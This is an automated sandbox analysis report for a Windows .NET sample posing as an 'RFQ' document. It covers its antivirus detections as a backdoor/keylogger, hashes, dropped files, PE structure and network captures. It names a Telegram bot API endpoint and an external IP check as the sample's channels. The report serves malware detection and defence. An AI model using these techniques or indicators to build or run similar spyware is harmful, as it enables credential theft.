                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
                  Source | Detection | Scanner | Label
                  RFQ__637456464647.exe | 46% | ReversingLabs | ByteCode-MSIL.Backdoor.Bladabhindi
                  RFQ__637456464647.exe | 100% | Joe Sandbox ML |

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Local\Temp\chrome.exe | 0% | Metadefender |
                  C:\Users\user\AppData\Local\Temp\chrome.exe | 0% | ReversingLabs |

                  Source | Detection | Scanner | Label
                  1.0.RFQ__637456464647.exe.400000.12.unpack | 100% | Avira | TR/ATRAPS.Gen
                  1.2.RFQ__637456464647.exe.400000.0.unpack | 100% | Avira | TR/ATRAPS.Gen
                  1.0.RFQ__637456464647.exe.400000.8.unpack | 100% | Avira | TR/ATRAPS.Gen
                  1.0.RFQ__637456464647.exe.400000.6.unpack | 100% | Avira | TR/ATRAPS.Gen
                  1.0.RFQ__637456464647.exe.400000.4.unpack | 100% | Avira | TR/ATRAPS.Gen
                  1.0.RFQ__637456464647.exe.400000.10.unpack | 100% | Avira | TR/ATRAPS.Gen

                  No Antivirus matches

                  Source | Detection | Scanner | Label
                  https://dsssdsa.fa)Uri | 0% | Avira URL Cloud | safe
                  http://checkip.dyndns.org/ | 0% | URL Reputation | safe
                  http://checkip.dyndns.org/q | 0% | URL Reputation | safe
                  http://www.smartassembly.com/webservices/Reporting/UploadReport2 | 0% | URL Reputation | safe
                  https://dsssdsa.fa | 0% | Avira URL Cloud | safe
                  http://checkip.dyndns.org | 0% | URL Reputation | safe
                  http://www.smartassembly.com/webservices/Reporting/ | 0% | URL Reputation | safe
                  http://checkip.dyndns.com | 0% | URL Reputation | safe
                  http://www.smartassembly.com/webservices/UploadReportLogin/ | 0% | URL Reputation | safe
                  http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL | 0% | URL Reputation | safe
                  http://checkip.dyndns.org4Jk | 0% | Avira URL Cloud | safe

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  checkip.dyndns.com | 132.226.8.169 | true | true | | unknown
                  checkip.dyndns.org | unknown | unknown | false | | unknown

                  Name | Malicious | Antivirus Detection | Reputation
                  http://checkip.dyndns.org/ | true | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dsssdsa.fa)Uri | RFQ__637456464647.exe | false | Avira URL Cloud: safe | low
https://crashpad.chromium.org/ | RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.dr | false | | high
https://api.telegram.org/bot | RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
https://crashpad.chromium.org/bug/new | RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.dr | false | | high
http://checkip.dyndns.org/q | RFQ__637456464647.exe, 00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://sawebservice.red-gate.com/ | RFQ__637456464647.exe | false | | high
http://www.smartassembly.com/webservices/Reporting/UploadReport2 | RFQ__637456464647.exe | false | URL Reputation: safe | unknown
https://dsssdsa.fa | RFQ__637456464647.exe | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | RFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.smartassembly.com/webservices/Reporting/ | RFQ__637456464647.exe | false | URL Reputation: safe | unknown
http://checkip.dyndns.com | RFQ__637456464647.exe, 00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | RFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new | RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.dr | false | | high
http://www.smartassembly.com/webservices/UploadReportLogin/ | RFQ__637456464647.exe | false | URL Reputation: safe | unknown
http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL | RFQ__637456464647.exe | false | URL Reputation: safe | unknown
http://checkip.dyndns.org4Jk | RFQ__637456464647.exe, 00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | true
                                  IP
                                  192.168.2.1
                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:632544
Start date and time:2022-05-23 18:58:49 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 10m 22s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:RFQ__637456464647.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:29
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@6/5@2/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HDC Information:
                                  • Successful, ratio: 16.1% (good quality ratio 13%)
                                  • Quality average: 58.1%
                                  • Quality standard deviation: 37.6%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
• Execution Graph export aborted for target chrome.exe, PID 6672 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
19:00:24 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                  No context
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):1.0802804484479727
                                  Encrypted:false
                                  SSDEEP:192:WOyEvUsxHBUZMXSaKtXfW/u7s4S274Itw:ZyEvUSBUZMXSah/u7s4X4Itw
                                  MD5:E56BC667B3B678430631F7CE3B8BBD4C
                                  SHA1:EA08F52BDD81A1D5BD03C34A20802621A13A5E8C
                                  SHA-256:3C7F3BEF460243B93180F3CCBD3CBC10971A29097D21F53C4B57598568A8058C
                                  SHA-512:F0ED9A2F476CD8B0899F8234DF82D1FFE2480992EC4EAE7A3957214828AFE6A64B9DCF86399061B7889A108F69F41485A778C450FBDC86D64B8B15D2E69B33D4
                                  Malicious:false
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.8.3.1.2.2.0.5.7.1.0.4.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.8.3.1.2.2.2.9.1.4.7.8.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.a.a.d.a.1.6.-.4.1.d.c.-.4.9.d.f.-.a.e.5.1.-.3.4.8.f.7.9.c.5.3.0.7.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.5.2.5.6.8.f.-.b.b.9.9.-.4.8.f.2.-.b.a.9.1.-.9.a.0.e.c.b.9.8.4.a.0.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.F.Q._._.6.3.7.4.5.6.4.6.4.6.4.7...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.J.x.I.I.a.R.U.T.v.a.L.x.e.x.P.W.T.L.b.b.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.8.-.0.0.0.1.-.0.0.1.d.-.9.b.e.e.-.a.2.f.7.1.1.6.f.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.b.d.2.8.a.4.2.a.c.e.9.6.7.0.f.5.3.9.7.b.7.b.0.8.5.f.4.b.9.c.f.0.0.0.0.0.0.0.0.!.0.0.0.0.5.9.2.a.8.1.4.a.4.2.8.c.8.a.5.d.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Tue May 24 02:00:21 2022, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):265529
                                  Entropy (8bit):3.312337303087705
                                  Encrypted:false
                                  SSDEEP:3072:rkHORSy0dv9UCgUnOw9gIOgF5xlH0DhmGndsTjd+pe:rkkTcTjP9RpDxt0AGFp
                                  MD5:7973C58C32915FBA6B5E4EEE9BF12854
                                  SHA1:8FBE6CBECD95C5CE84DC87F9A6399D06FD2BDBBC
                                  SHA-256:0583DBAE1CBBF287351119BDE87703268E64DA8D430F9D3C33A9D99C185432B2
                                  SHA-512:16E6182D38A8D0AB550B3FA310E6FC81E84E8AEEF686015B9050A2F8CB1A74D6C406CEFBC0A830E496F8655DEADB904F7444CA7835083ECBF4B1235098380EE9
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP....... .......5<.b............t.......................T...p"...........T..........`.......8...........T............A..)............"...........$...................................................................U...........B......H%......GenuineIntelW...........T............<.b.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8422
                                  Entropy (8bit):3.6962392631754497
                                  Encrypted:false
                                  SSDEEP:192:Rrl7r3GLNicG6yVG6YWhSUvlCvGgmfZF3S3Cprz89bphsfSYjm:RrlsNi16yVG6YgSUvlzgmf73S7pafSx
                                  MD5:DB6D045DBC6C75AE674930E621C24D0C
                                  SHA1:EC5D9E89F492C938C6B45FD7948D6D7E630575C0
                                  SHA-256:6763D58AA2DA5B1C0DB34B2CD54ABF3DEA1334933A99F235945CFDD3CD6B445A
                                  SHA-512:27D6CDA8DA201F33BCEFFBD510B010C421FD95B0D2871636315AA63C3147B43E11CB310388FB9AD143452D723651EFF61E9350C20A72AD7EB47BF5352048A18A
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.1.2.<./.P.i.d.>.......
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4794
                                  Entropy (8bit):4.506229802328503
                                  Encrypted:false
                                  SSDEEP:48:cvIwSD8zsjJgtWI9AGWgc8sqYj68fm8M4JKOwO7FnHno+q8vrOwOsUPOY4TsK3QE:uITf9nHgrsqYbJ7wcIKawyPO1Y1ud
                                  MD5:10BD2D57F1961B27D477C05A55D89E59
                                  SHA1:1ABFAD5821C4BC61962184488F33565531BB59F9
                                  SHA-256:40DBD1A60D73AA328FAB8171384B79764B1A0F1A934FB1038CC0BE506F2CEB11
                                  SHA-512:D8A24722E437F15B220AF4A2AC6BB5DA80E8F6B90C25CA69C3FCE203329D755953F8F9B739039FC3EE766DFB9D7273A9790535D741CBB8856F02A386D36C828F
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1528511" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                  Process:C:\Users\user\Desktop\RFQ__637456464647.exe
                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):2622352
                                  Entropy (8bit):6.584925607886023
                                  Encrypted:false
                                  SSDEEP:49152:ZkwWDBRk5Swp1oFSFb8XUK+3crWECSP/cESM0RCZ/Sf8peUTbVkyC:2TX79FXCaSMHpC
                                  MD5:7F916511A313837EFCDE9E4112A64E5B
                                  SHA1:6A2A2427CF1D888CB40A18527478C84DEDF1DB61
                                  SHA-256:F342AF2B1E3DD9BA90C10F643EC1F50459EFBB5912496E8AC553682C2B7A9F6E
                                  SHA-512:A2F92AE37D6ECD16D7B4312EA2548F494D01BD386A439E05258073F4038FCFA60BD7D79FCB8CA5B285BAC121799826B87655EC594F7B4A9CCF5DA70CE3273E1B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Reputation:low
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....|b.........."...........................@..............................(.......(...`..........................................u ......u .P.....#.P.....".......'..#....(..#...L .8...................XK .(....!..0............} .....`f .`....................text...x........................... ..`.rdata...#... ...$..................@..@.data....+...P!......,!.............@....pdata........".......!.............@..@.00cfg..(....`#.......".............@..@.retplne$....p#......."..................tls....9.....#.......".............@...CPADinfo8.....#.......".............@..._RDATA........#.......".............@..@.rsrc...P.....#.......".............@..@.reloc...#....(..$....'.............@..B................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.991836040381107
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:RFQ__637456464647.exe
                                  File size:2844160
                                  MD5:b4bc907e8d48e8f09b4d9fdd8d416599
                                  SHA1:592a814a428c8a5de3f06245996fc775e8dc987f
                                  SHA256:7f7804a5460695dae61e378d733f0a613083e84c654ea6264a5276944b33f943
                                  SHA512:b74608846f9e494789e52b79e1aab9fd5fa7918b46441cc0cf2ee0d2883151c327180b4119bbeae6bd83360dcedc8c6142e6fab0b56650b818aa51a2527d6759
                                  SSDEEP:49152:oXJTCTSfReUawVjvGdhAD7E3IJ6daAQeFdjwCE1/02Xro9+83qpK:suoRZawVjvGdhGE3IJA/jwD82013q
                                  TLSH:A9D52383B38AA47AF0BC25B4DCC3EB834F65579C5665FCD62A8151AC38253BBE570213
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b.................Z+..........y+.. ....+...@.. ........................+.......+...@................................
                                  Icon Hash:00828e8e8686b000
                                  Entrypoint:0x6b791a
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x628B062E [Mon May 23 03:57:34 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
add byte ptr [eax], al
(the instruction above repeats for the remainder of the decoded entrypoint region; it is the disassembly of the zero-byte padding that follows the jmp)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2b78d0 | 0x4a | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2b8000 | 0x72a | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2ba000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2b5920 | 0x2b5a00 | unknown | unknown | unknown | unknown | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x2b8000 | 0x72a | 0x800 | False | 0.31591796875 | data | 4.48924436504 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x2ba000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x2b80b8 | 0x27c | data | |
RT_MANIFEST | 0x2b8334 | 0x1fa | XML 1.0 document, ASCII text, with very long lines, with no line terminators | |
RT_MANIFEST | 0x2b8530 | 0x1fa | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright |
Assembly Version | 0.0.0.0
InternalName | JxIIaRUTvaLxexPWTLbbe.exe
FileVersion | 0.0.0.0
ProductVersion | 0.0.0.0
FileDescription |
OriginalFilename | JxIIaRUTvaLxexPWTLbbe.exe
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/23/22-19:00:12.710166 | TCP | 2842536 | ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check | 49740 | 80 | 192.168.2.3 | 132.226.8.169
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2022 19:00:09.422519922 CEST | 49740 | 80 | 192.168.2.3 | 132.226.8.169
May 23, 2022 19:00:12.433237076 CEST | 49740 | 80 | 192.168.2.3 | 132.226.8.169
May 23, 2022 19:00:12.709538937 CEST | 80 | 49740 | 132.226.8.169 | 192.168.2.3
May 23, 2022 19:00:12.709647894 CEST | 49740 | 80 | 192.168.2.3 | 132.226.8.169
May 23, 2022 19:00:12.710165977 CEST | 49740 | 80 | 192.168.2.3 | 132.226.8.169
May 23, 2022 19:00:12.986522913 CEST | 80 | 49740 | 132.226.8.169 | 192.168.2.3
May 23, 2022 19:00:13.988107920 CEST | 80 | 49740 | 132.226.8.169 | 192.168.2.3
May 23, 2022 19:00:14.126456022 CEST | 49740 | 80 | 192.168.2.3 | 132.226.8.169
May 23, 2022 19:01:18.987670898 CEST | 80 | 49740 | 132.226.8.169 | 192.168.2.3
May 23, 2022 19:01:18.987759113 CEST | 49740 | 80 | 192.168.2.3 | 132.226.8.169
May 23, 2022 19:01:54.057121992 CEST | 49740 | 80 | 192.168.2.3 | 132.226.8.169
May 23, 2022 19:01:54.333545923 CEST | 80 | 49740 | 132.226.8.169 | 192.168.2.3
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  May 23, 2022 19:00:09.279763937 CEST | 64851 | 53 | 192.168.2.3 | 8.8.8.8
                                  May 23, 2022 19:00:09.298605919 CEST | 53 | 64851 | 8.8.8.8 | 192.168.2.3
                                  May 23, 2022 19:00:09.312563896 CEST | 49316 | 53 | 192.168.2.3 | 8.8.8.8
                                  May 23, 2022 19:00:09.331444979 CEST | 53 | 49316 | 8.8.8.8 | 192.168.2.3
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                  May 23, 2022 19:00:09.279763937 CEST | 192.168.2.3 | 8.8.8.8 | 0xc5ee | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.312563896 CEST | 192.168.2.3 | 8.8.8.8 | 0x2cce | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                  May 23, 2022 19:00:09.298605919 CEST | 8.8.8.8 | 192.168.2.3 | 0xc5ee | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST | 8.8.8.8 | 192.168.2.3 | 0xc5ee | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST | 8.8.8.8 | 192.168.2.3 | 0xc5ee | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST | 8.8.8.8 | 192.168.2.3 | 0xc5ee | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST | 8.8.8.8 | 192.168.2.3 | 0xc5ee | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.298605919 CEST | 8.8.8.8 | 192.168.2.3 | 0xc5ee | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST | 8.8.8.8 | 192.168.2.3 | 0x2cce | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST | 8.8.8.8 | 192.168.2.3 | 0x2cce | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST | 8.8.8.8 | 192.168.2.3 | 0x2cce | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST | 8.8.8.8 | 192.168.2.3 | 0x2cce | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST | 8.8.8.8 | 192.168.2.3 | 0x2cce | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001)
                                  May 23, 2022 19:00:09.331444979 CEST | 8.8.8.8 | 192.168.2.3 | 0x2cce | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001)
                                  • checkip.dyndns.org
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                  0 | 192.168.2.3 | 49740 | 132.226.8.169 | 80 | C:\Users\user\Desktop\RFQ__637456464647.exe
                                  Timestamp | kBytes transferred | Direction | Data
                                  May 23, 2022 19:00:12.710165977 CEST | 1139 | OUT | GET / HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                  Host: checkip.dyndns.org
                                  Connection: Keep-Alive
                                  May 23, 2022 19:00:13.988107920 CEST | 1139 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 23 May 2022 17:00:13 GMT
                                  Content-Type: text/html
                                  Content-Length: 103
                                  Connection: keep-alive
                                  Cache-Control: no-cache
                                  Pragma: no-cache
